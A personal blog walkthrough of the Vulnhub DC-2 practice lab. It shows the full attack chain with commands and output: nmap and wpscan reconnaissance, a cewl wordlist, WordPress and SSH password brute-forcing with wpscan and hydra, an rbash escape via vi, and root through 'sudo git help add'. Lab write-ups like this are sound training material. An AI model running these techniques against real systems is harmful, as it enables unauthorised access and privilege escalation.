Walkthrough: Vulnhub - DC: 2

· by Christoph Stoettner · Read in about 8 min · (1690 words)

TL;DR

Download and Informations
Original Description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

Technical Information

DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven’t tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

Please note that you will need to set the hosts file on your pentesting device to something like:

/etc/hosts
192.168.0.145 dc-2  (1)
1Obviously, replace 192.168.0.145 with the actual IP address of DC-2.

It will make life a whole lot simpler (and a certain CMS may not work without it).

If you’re not sure how to do this, instructions are here.

Recon

Find IP
nmap -sn 10.128.1.150-200 (1)
1Changed dhcp range

Create /etc/hosts entry

/etc/hosts
10.128.1.155 dc-2

Find open ports

root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST
Nmap scan report for dc-2 (10.128.1.155)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site    (1)
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:9D:5E:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.11 ms dc-2 (10.128.1.155)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
1Wordpress this time

Wordpress

wpscan

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.5
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/
[+] Started: Sun Jan  5 10:31:52 2020

Interesting Finding(s):

[+] http://dc-2/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).     (1)
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |
 | [!] 21 vulnerabilities identified:                                           (2)
 |
...
1Wordpress Version
221 known vulnerabilities

Enumerate Users

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Ok, so we found three users:

  • admin

  • jerry

  • tom

Opening the page gave us Flag 1. So next goal is login to wordpress.

2020 01 05 21 53 31
Figure 1. Wordpress page

We got the hint to be cewl! That’s a tool to generate passwords out of the text of webpages.

Generate wordlist

root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2

Find matching passwords

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry'

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

So login with one of the two users and check Pages  Flag 2 and you will find the next flag.

SSH

Check if one of the Wordpress passwords are working on the SSH port (see nmap).

root@kali:~/vulnhub/dc2# cat users
admin
tom
jerry

root@kali:~/vulnhub/dc2# cat success_pw
parturient
adipiscing

root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh

[DATA] attacking ssh://10.128.1.155:7744/
[7744][ssh] host: 10.128.1.155   login: tom   password: parturient      (1)

Now try ssh with user tom

root@kali:~/vulnhub/dc2# man ssh
root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744
The authenticity of host '[10.128.1.155]:7744 ([10.128.1.155]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[10.128.1.155]:7744' (ECDSA) to the list of known hosts.
tom@10.128.1.155's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ ls usr/bin
less  ls  scp  vi

tom@DC-2:~$ less flag3.txt

Escape rbash

We have a very limit shell (rbash) and ~/usr/bin only shows less, ls, scp and vi, but with vi or less we can read flag3.txt.

Run external command in vi

vi can run external commands, so I tried running :set shell=/bin/bash and :! /bin/bash from within vi. I got a better shell.

SHELL and PATH
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash

There is no need to su into the jerry useraccount to read flag4, but you need it to get to the last flag. Flag4 is world readable in his home.

Jerry wasn’t allowed to login with ssh, but it works on the console:

tom@DC-2:/$ su jerry
Password:             (1)
jerry@DC-2:/$ sudo -l

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
1Use the password found with wpscan here

I had some headaches how to get git to open a root-shell.

Root Shell with git

git help add for example opens the man page of git add. Default program to open the man page is less here. less can - like vi before - run external commands. So ! /bin/bash within less runs a new bash. Jerry is allowed to run git with sudo. So that’s the trick to get the final flag.

jerry@DC-2:/$ sudo git help add
root@DC-2:/# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt

So we got the Final Flag.

Flags

Flag 1

Found directly as Wordpress Post:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

Flag 2

Login is tom or jerry and check Pages  Flag 2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Flag 3

/home/tom/flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Flag 4

/home/jerry/flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

Final Flag

/root/final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Final thoughts

This machine was real fun! I learned some new tools and ways to start shells. Never ran a shell through an editor like vi or less before.

cewl was completely new for me and I already think about how to use it more often.

Thanks to @DCAU7! Seeing forward to the other machines in the DC Series